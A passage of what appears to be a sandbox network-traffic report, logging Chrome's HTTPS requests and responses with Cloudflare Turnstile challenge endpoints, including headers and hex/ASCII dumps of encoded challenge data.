                                                                                                                              2024-11-18 16:55:51 UTC622INData Raw: 71 58 69 4d 77 5a 62 46 6f 72 57 5a 75 49 4f 65 6c 4d 4b 5a 78 6f 76 4d 30 37 79 4c 77 4d 2f 48 32 4e 65 76 32 5a 6e 4a 33 35 2b 59 33 72 58 43 33 63 2f 67 73 39 4b 2f 34 4c 57 6e 77 72 6e 62 35 75 76 73 77 4e 37 4c 38 37 4b 77 7a 38 6e 6d 2f 50 76 66 2f 62 33 76 33 64 32 2f 38 76 72 36 43 51 6a 35 43 73 67 4b 37 51 58 4a 44 75 48 37 7a 77 49 59 43 38 2f 74 46 65 77 48 38 2f 62 78 32 42 33 32 39 64 77 68 34 41 6e 79 4a 53 51 66 35 78 67 70 41 68 73 49 4c 4f 37 74 44 53 44 30 4c 77 34 31 44 79 63 55 4d 42 37 35 50 55 41 34 2f 55 45 38 49 45 59 45 52 45 67 4c 43 44 6b 65 44 67 30 4b 44 46 45 4f 46 44 6b 78 53 6b 38 75 4b 46 4d 75 55 68 67 69 56 45 30 64 59 55 5a 49 4d 54 39 73 56 79 6b 74 5a 30 52 47 52 57 35 68 4c 6b 5a 4d 61 32 56 6a 63 58 4e 56 66 44 35
                                                                                                                              Data Ascii: qXiMwZbForWZuIOelMKZxovM07yLwM/H2Nev2ZnJ35+Y3rXC3c/gs9K/4LWnwrnb5uvswN7L87Kwz8nm/Pvf/b3v3d2/8vr6CQj5CsgK7QXJDuH7zwIYC8/tFewH8/bx2B329dwh4AnyJSQf5xgpAhsILO7tDSD0Lw41DycUMB75PUA4/UE8IEYEREgLCDkeDg0KDFEOFDkxSk8uKFMuUhgiVE0dYUZIMT9sVyktZ0RGRW5hLkZMa2VjcXNVfD5
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 78 68 59 49 79 50 67 57 64 73 6c 70 56 7a 63 6d 79 54 62 36 4b 69 67 6e 65 59 6b 70 4a 32 64 48 68 6c 66 6e 2b 70 73 70 31 73 63 71 2b 66 68 33 57 51 68 5a 68 38 6e 58 78 36 6e 33 65 30 72 71 48 42 68 72 43 62 75 6f 61 63 71 71 53 38 73 4b 36 6d 77 4c 2b 4d 76 5a 47 4a 71 5a 57 75 6d 62 4f 39 6e 4b 72 50 31 70 36 64 6c 75 58 6a 34 73 4c 62 71 75 76 48 75 61 76 61 35 2b 48 75 34 4c 2b 78 35 63 2f 5a 37 76 72 34 74 65 66 58 74 2b 37 55 31 2b 7a 6b 77 66 50 66 42 73 6a 64 2b 38 77 4f 42 41 59 48 35 2f 77 41 44 76 50 52 37 42 62 32 36 2b 34 57 37 64 6e 74 38 74 7a 59 39 53 50 66 47 50 4d 70 43 4f 6a 37 4c 67 73 6f 39 7a 41 4f 42 76 73 30 48 77 6f 41 4f 42 73 4f 42 44 77 65 45 67 68 41 4c 78 59 4d 52 44 49 61 45 45 67 30 48 68 52 4d 50 79 49 59 55 45 49 78 49
                                                                                                                              Data Ascii: xhYIyPgWdslpVzcmyTb6KigneYkpJ2dHhlfn+psp1scq+fh3WQhZh8nXx6n3e0rqHBhrCbuoacqqS8sK6mwL+MvZGJqZWumbO9nKrP1p6dluXj4sLbquvHuava5+Hu4L+x5c/Z7vr4tefXt+7U1+zkwfPfBsjd+8wOBAYH5/wADvPR7Bb26+4W7dnt8tzY9SPfGPMpCOj7Lgso9zAOBvs0HwoAOBsOBDweEghALxYMRDIaEEg0HhRMPyIYUEIxI
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 70 69 35 64 2f 6c 58 4a 30 64 6e 5a 38 68 5a 42 33 64 48 53 49 6d 36 79 58 6c 33 2b 78 6b 61 74 37 73 36 4b 4a 66 37 65 6c 6a 59 4f 37 70 35 47 48 76 37 4b 56 69 38 4f 31 70 4a 4f 5a 66 36 75 61 7a 61 62 4d 6e 4a 75 74 6a 4b 57 6d 6f 4d 4c 42 77 64 62 47 78 62 76 61 79 73 6d 37 33 73 37 4d 34 65 4c 53 30 4e 33 6d 31 74 54 64 36 74 72 59 70 75 37 65 33 4c 4c 79 34 75 44 35 39 75 62 6b 30 4c 6e 36 78 2b 7a 4f 77 62 58 67 76 63 62 64 42 38 48 4b 38 2f 72 46 7a 73 6e 74 45 2f 34 51 7a 67 58 52 36 73 37 35 32 41 30 4f 38 4f 6b 56 36 78 6e 5a 2b 53 59 61 35 66 7a 68 47 41 7a 64 2f 67 45 76 36 53 50 6a 44 65 2f 73 46 2f 48 70 49 6a 45 53 4e 69 63 36 4d 51 77 2f 4d 42 52 44 4f 68 55 6e 50 78 34 64 48 51 59 36 54 43 38 65 50 43 6f 7a 44 45 78 43 4d 79 64 51 4f 54
                                                                                                                              Data Ascii: pi5d/lXJ0dnZ8hZB3dHSIm6yXl3+xkat7s6KJf7eljYO7p5GHv7KVi8O1pJOZf6uazabMnJutjKWmoMLBwdbGxbvaysm73s7M4eLS0N3m1tTd6trYpu7e3LLy4uD59ubk0Ln6x+zOwbXgvcbdB8HK8/rFzsntE/4QzgXR6s752A0O8OkV6xnZ+SYa5fzhGAzd/gEv6SPjDe/sF/HpIjESNic6MQw/MBRDOhUnPx4dHQY6TC8ePCozDExCMydQOT
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 6e 49 42 77 63 4b 43 45 64 48 4b 6b 69 48 74 66 71 49 78 2f 5a 33 75 4e 6e 35 32 6b 6f 6f 56 34 6a 5a 65 62 68 6e 57 6e 67 4a 37 42 6f 72 71 67 77 71 65 6b 78 72 61 31 70 38 71 36 75 4d 33 4f 76 72 7a 4a 30 73 4c 41 78 34 2b 54 73 5a 75 59 33 74 32 53 6d 62 6a 58 30 64 72 57 70 75 43 34 79 4c 50 6d 70 63 43 70 75 2b 2f 54 72 71 7a 69 34 4c 47 31 78 4e 6e 4c 79 64 6a 61 37 38 33 71 38 4e 58 4d 77 39 76 6f 39 38 6a 54 2b 64 6e 31 33 77 76 61 2f 4f 33 71 37 41 4c 6b 42 4f 6a 6b 42 77 2f 6f 2b 52 4d 65 43 52 44 32 45 69 50 58 41 69 44 35 47 68 6b 67 42 42 30 62 2f 53 6e 35 45 78 4d 57 4a 67 76 79 44 76 51 53 46 54 72 35 46 6a 45 4c 44 77 30 52 4f 53 4d 34 50 68 68 46 4b 54 67 6b 52 77 6f 77 44 79 45 6d 53 77 31 52 4e 30 55 73 49 78 49 38 4d 56 30 37 4f 43 39
                                                                                                                              Data Ascii: nIBwcKCEdHKkiHtfqIx/Z3uNn52kooV4jZebhnWngJ7Borqgwqekxra1p8q6uM3OvrzJ0sLAx4+TsZuY3t2SmbjX0drWpuC4yLPmpcCpu+/Trqzi4LG1xNnLydja783q8NXMw9vo98jT+dn13wva/O3q7ALkBOjkBw/o+RMeCRD2EiPXAiD5GhkgBB0b/Sn5ExMWJgvyDvQSFTr5FjELDw0ROSM4PhhFKTgkRwowDyEmSw1RN0UsIxI8MV07OC9
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 6e 31 67 64 35 2b 64 6c 32 2b 42 68 4b 4b 68 63 4c 52 30 6f 71 32 57 64 6f 32 34 6b 71 64 34 6f 4c 71 39 66 62 69 43 6b 34 4f 36 6d 37 2f 44 67 38 71 4f 79 4c 33 4d 73 62 75 4d 78 4a 62 42 70 37 4c 49 7a 4b 6d 32 70 70 32 74 75 71 72 4d 73 62 36 63 34 4c 58 43 6f 4f 6e 49 34 73 7a 6c 76 38 72 66 76 61 7a 43 39 4f 4c 47 39 73 7a 4e 36 39 7a 56 39 4d 76 56 76 76 6e 4f 78 62 37 37 30 76 6e 4b 42 4e 58 37 79 65 49 50 32 2b 59 4e 46 4e 34 4d 31 2f 66 57 42 42 66 71 37 77 6e 75 2f 75 6b 4f 2b 77 30 53 2b 68 55 41 42 50 4c 6d 2b 78 66 6c 47 77 51 73 2f 41 55 4f 46 41 38 67 2b 44 59 4e 38 79 73 73 47 44 67 4f 4f 66 6b 45 4e 30 51 30 4e 69 55 63 4b 54 51 61 4b 53 30 36 49 43 67 72 55 30 4e 42 43 53 68 54 4d 55 67 32 4f 69 70 49 47 42 64 4f 4f 44 78 63 52 31 5a 6f
                                                                                                                              Data Ascii: n1gd5+dl2+BhKKhcLR0oq2Wdo24kqd4oLq9fbiCk4O6m7/Dg8qOyL3MsbuMxJbBp7LIzKm2pp2tuqrMsb6c4LXCoOnI4szlv8rfvazC9OLG9szN69zV9MvVvvnOxb770vnKBNX7yeIP2+YNFN4M1/fWBBfq7wnu/ukO+w0S+hUABPLm+xflGwQs/AUOFA8g+DYN8yssGDgOOfkEN0Q0NiUcKTQaKS06ICgrU0NBCShTMUg2OipIGBdOODxcR1Zo
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 4b 5a 67 4a 4b 75 68 32 75 6b 6f 72 4b 47 65 49 4e 36 72 4c 46 33 6f 59 79 37 65 35 65 6c 66 49 4b 77 6e 49 43 68 78 72 33 44 6d 5a 36 4d 79 62 75 4e 31 73 7a 4f 32 5a 4f 54 79 35 4c 57 74 5a 6a 41 72 4a 36 33 33 72 72 54 77 63 57 31 30 38 69 6d 32 65 54 4d 78 64 33 6f 33 62 44 41 78 4d 43 32 74 2b 72 35 74 4c 33 50 32 39 33 38 34 64 6a 41 42 37 2f 63 77 38 63 4c 43 73 54 4e 33 2b 76 74 44 66 48 6f 30 42 66 50 37 4e 50 58 47 78 72 55 33 65 2f 37 2f 52 30 43 2b 4f 48 30 2b 51 55 49 45 77 72 71 37 42 30 72 2b 75 59 53 37 41 38 6d 43 51 49 74 37 79 30 55 47 76 67 72 2b 44 55 59 49 67 45 31 4e 68 6b 47 46 78 52 43 43 7a 6f 59 44 52 67 34 48 6b 63 4d 4e 46 45 4f 54 78 4d 54 57 44 78 50 56 45 63 39 4c 53 70 57 52 46 63 2b 51 45 4d 79 59 44 67 38 58 47 34 39 51
                                                                                                                              Data Ascii: KZgJKuh2ukorKGeIN6rLF3oYy7e5elfIKwnIChxr3DmZ6MybuN1szO2ZOTy5LWtZjArJ633rrTwcW108im2eTMxd3o3bDAxMC2t+r5tL3P29384djAB7/cw8cLCsTN3+vtDfHo0BfP7NPXGxrU3e/7/R0C+OH0+QUIEwrq7B0r+uYS7A8mCQIt7y0UGvgr+DUYIgE1NhkGFxRCCzoYDRg4HkcMNFEOTxMTWDxPVEc9LSpWRFc+QEMyYDg8XG49Q
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 6b 6f 71 57 53 64 37 65 48 72 48 6d 37 65 72 6c 39 72 34 36 43 66 58 2b 55 6b 33 79 42 77 70 57 41 7a 5a 2b 4c 69 4a 75 2b 6e 5a 61 76 75 4b 48 4a 30 70 53 77 71 63 32 74 7a 4c 36 63 6f 4b 47 2b 77 4f 47 6b 34 71 6a 4b 33 65 50 69 36 38 48 4d 76 39 4c 72 36 2f 66 59 31 38 57 7a 75 63 66 64 30 4e 57 7a 38 2f 72 31 32 77 51 46 41 75 44 34 2f 67 37 38 2b 74 38 42 32 67 4d 4b 36 52 51 49 37 76 6a 6b 38 39 66 6f 2b 77 63 50 31 76 76 71 33 76 4d 44 34 75 63 53 47 65 59 58 39 78 33 32 47 77 51 68 37 79 2f 2b 38 76 51 46 42 51 62 31 45 7a 63 48 2f 76 56 43 47 77 74 42 46 41 4d 50 46 43 51 46 52 43 30 45 50 67 45 4f 55 55 5a 52 4c 46 59 6b 54 54 52 59 4d 44 4a 59 53 42 63 74 4c 69 45 35 55 7a 46 6d 57 68 39 5a 4f 44 67 71 51 52 39 43 61 6b 45 75 62 32 64 71 54 44
                                                                                                                              Data Ascii: koqWSd7eHrHm7erl9r46CfX+Uk3yBwpWAzZ+LiJu+nZavuKHJ0pSwqc2tzL6coKG+wOGk4qjK3ePi68HMv9Lr6/fY18Wzucfd0NWz8/r12wQFAuD4/g78+t8B2gMK6RQI7vjk89fo+wcP1vvq3vMD4ucSGeYX9x32GwQh7y/+8vQFBQb1EzcH/vVCGwtBFAMPFCQFRC0EPgEOUUZRLFYkTTRYMDJYSBctLiE5UzFmWh9ZODgqQR9CakEub2dqTD
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 76 4c 52 37 72 4b 71 32 75 34 36 65 75 72 2b 54 6c 4c 2b 73 78 4b 58 43 6a 4b 54 46 73 71 76 53 31 4b 4c 4e 73 4b 4b 34 71 4d 66 53 75 39 4f 74 30 4d 72 65 78 62 44 59 74 64 76 70 77 65 57 34 31 37 75 6f 36 63 33 54 30 65 4b 72 39 62 44 4a 34 74 6a 5a 31 4f 58 77 32 4d 2f 52 2f 50 7a 57 33 67 48 46 31 4e 48 48 42 73 63 4e 42 63 76 38 2b 67 63 4d 33 75 34 4c 45 4f 50 6b 45 50 77 56 39 52 50 63 39 42 59 44 49 69 4d 6e 38 68 34 42 38 67 6e 34 47 43 4d 4d 4a 50 30 68 47 79 38 57 2f 69 6b 73 4c 44 6f 55 45 41 6b 62 45 54 38 68 50 52 4d 65 4f 78 34 59 49 52 46 46 48 55 78 46 4c 45 31 50 48 45 6b 53 52 52 4d 66 4a 6a 46 44 55 30 4e 58 4e 6c 46 48 4b 78 63 78 51 31 64 67 52 30 67 33 4f 7a 6b 35 59 30 56 48 62 30 4e 44 63 6d 56 64 53 33 55 2f 52 46 6c 70 4f 48 45
                                                                                                                              Data Ascii: vLR7rKq2u46eur+TlL+sxKXCjKTFsqvS1KLNsKK4qMfSu9Ot0MrexbDYtdvpweW417uo6c3T0eKr9bDJ4tjZ1OXw2M/R/PzW3gHF1NHHBscNBcv8+gcM3u4LEOPkEPwV9RPc9BYDIiMn8h4B8gn4GCMMJP0hGy8W/iksLDoUEAkbET8hPRMeOx4YIRFFHUxFLE1PHEkSRRMfJjFDU0NXNlFHKxcxQ1dgR0g3Ozk5Y0VHb0NDcmVdS3U/RFlpOHE
                                                                                                                              2024-11-18 16:55:51 UTC1369INData Raw: 49 48 44 6c 73 4f 63 6b 36 71 6c 70 73 61 4f 76 5a 32 72 79 36 61 6e 6e 71 36 34 31 61 54 55 77 34 36 38 6c 63 65 53 79 72 71 38 33 4c 69 6c 74 72 50 65 74 64 61 69 37 71 54 64 78 39 75 36 33 73 76 50 78 73 54 77 77 66 44 47 39 72 54 79 7a 76 37 50 77 64 47 38 34 2f 7a 2b 78 76 76 79 2f 50 54 56 78 66 37 6d 2b 77 50 64 33 4f 34 4a 7a 68 48 74 30 4f 63 65 38 65 33 59 49 66 58 63 48 43 50 35 42 76 45 6e 2f 51 73 73 4b 77 49 50 49 79 44 37 49 4f 77 4f 39 4f 30 69 41 68 4c 79 45 54 30 75 42 79 6b 66 46 42 50 35 4f 42 4d 77 41 6a 34 57 43 51 5a 42 44 43 55 35 51 79 45 72 55 30 4e 42 43 53 68 54 4d 55 67 32 4f 52 74 49 47 42 64 50 50 45 52 50 59 56 78 47 49 56 6b 71 56 6a 78 48 58 47 45 2b 53 79 6c 79 55 57 74 56 62 6b 68 54 61 45 59 31 53 33 31 72 54 33 39 51
                                                                                                                              Data Ascii: IHDlsOck6qlpsaOvZ2ry6annq641aTUw468lceSyrq83LiltrPetdai7qTdx9u63svPxsTwwfDG9rTyzv7PwdG84/z+xvvy/PTVxf7m+wPd3O4JzhHt0Oce8e3YIfXcHCP5BvEn/QssKwIPIyD7IOwO9O0iAhLyET0uBykfFBP5OBMwAj4WCQZBDCU5QyErU0NBCShTMUg2ORtIGBdPPERPYVxGIVkqVjxHXGE+SylyUWtVbkhTaEY1S31rT39Q


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              19192.168.2.1749735104.18.94.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:53 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:53 UTC379INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:53 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 7
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              cf-chl-out: ZNmd9tj5k8Rbt3a67IwVYjty2/ijv/tc7OQ=$E9u5z8yzrOSODwFK
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497d9fcdc4485f-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-11-18 16:55:53 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                              Data Ascii: invalid


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              20192.168.2.1749736104.18.94.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:53 UTC785OUTGET /cdn-cgi/challenge-platform/h/b/i/8e497d813cb62ff4/1731948951564/p8JSJGxodSL51Dr HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:53 UTC200INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:53 GMT
                                                                                                                              Content-Type: image/png
                                                                                                                              Content-Length: 61
                                                                                                                              Connection: close
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497da1bc312c8e-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-11-18 16:55:53 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 63 00 00 00 62 08 02 00 00 00 cb 05 fa 67 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                              Data Ascii: PNGIHDRcbgIDAT$IENDB`


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              21192.168.2.1749737104.18.94.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:54 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8e497d813cb62ff4/1731948951564/p8JSJGxodSL51Dr HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:54 UTC200INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:54 GMT
                                                                                                                              Content-Type: image/png
                                                                                                                              Content-Length: 61
                                                                                                                              Connection: close
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e497da6c8be3acd-DFW
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              2024-11-18 16:55:54 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 63 00 00 00 62 08 02 00 00 00 cb 05 fa 67 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                              Data Ascii: PNGIHDRcbgIDAT$IENDB`


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              22192.168.2.1749738104.18.94.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:55 UTC814OUTGET /cdn-cgi/challenge-platform/h/b/pat/8e497d813cb62ff4/1731948951576/044ddceecbee23a905e087f0dcbf9c62295d312b4bb3ef95c5855d29fd2991d0/qFAA1Rd1fZGxcNU HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: max-age=0
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:55 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                              Date: Mon, 18 Nov 2024 16:55:55 GMT
                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                              Content-Length: 1
                                                                                                                              Connection: close
                                                                                                                              2024-11-18 16:55:55 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 42 45 33 63 37 73 76 75 49 36 6b 46 34 49 66 77 33 4c 2d 63 59 69 6c 64 4d 53 74 4c 73 2d 2d 56 78 59 56 64 4b 66 30 70 6b 64 41 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                              Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gBE3c7svuI6kF4Ifw3L-cYildMStLs--VxYVdKf0pkdAAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                              2024-11-18 16:55:55 UTC1INData Raw: 4a
                                                                                                                              Data Ascii: J


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              23192.168.2.1749739104.18.94.414436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-18 16:55:56 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1934195006:1731948353:unz671KSRq1ToGyOHQQkK3w4rNHjodEQ7ar4OrQ9NOM/8e497d813cb62ff4/MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 31998
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              CF-Challenge: MDvrsZI1VGmqlLbJRpJUmll3UtGGVQo4c3IEyGk_pTQ-1731948948-1.1.1.1-tjPxUzHkLuXL14nwMEaUPUlXPG6NhyXQNVxCbHUc0PNpbzwGotvMckMqufOiL4HB
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-11-18 16:55:56 UTC16384OUTData Raw: 76 5f 38 65 34 39 37 64 38 31 33 63 62 36 32 66 66 34 3d 42 61 6b 53 72 4c 66 77 49 74 49 54 49 66 6f 66 62 5a 70 5a 31 56 36 5a 72 5a 32 5a 62 67 66 74 66 34 5a 38 53 51 74 66 37 5a 42 43 63 77 6d 5a 6a 6b 53 4d 43 36 64 61 66 71 5a 6e 59 55 5a 66 49 75 57 5a 75 67 66 44 4c 5a 4d 6b 5a 63 68 5a 36 6d 5a 73 72 68 61 53 5a 57 48 53 66 24 75 4c 4d 66 4c 54 5a 45 53 36 74 5a 4c 58 59 46 5a 39 5a 63 41 37 65 4a 53 54 57 4b 5a 64 58 4a 53 66 39 47 72 49 24 24 5a 52 53 56 2d 49 49 54 78 5a 66 25 32 62 5a 4e 50 37 38 53 5a 6e 5a 5a 2b 56 5a 36 2b 37 2d 4e 59 39 4d 79 58 4c 4a 4d 58 61 37 6b 5a 4d 79 79 72 44 4c 31 51 56 63 53 66 72 4d 53 52 57 76 53 5a 42 75 67 5a 32 35 6e 78 78 77 49 66 55 74 72 6b 62 79 6e 71 65 6b 73 54 4b 50 39 70 62 44 75 2d 39 50 70 62 4c
                                                                                                                              Data Ascii: v_8e497d813cb62ff4=BakSrLfwItITIfofbZpZ1V6ZrZ2Zbgftf4Z8SQtf7ZBCcwmZjkSMC6dafqZnYUZfIuWZugfDLZMkZchZ6mZsrhaSZWHSf$uLMfLTZES6tZLXYFZ9ZcA7eJSTWKZdXJSf9GrI$$ZRSV-IITxZf%2bZNP78SZnZZ+VZ6+7-NY9MyXLJMXa7kZMyyrDL1QVcSfrMSRWvSZBugZ25nxxwIfUtrkbynqeksTKP9pbDu-9PpbL
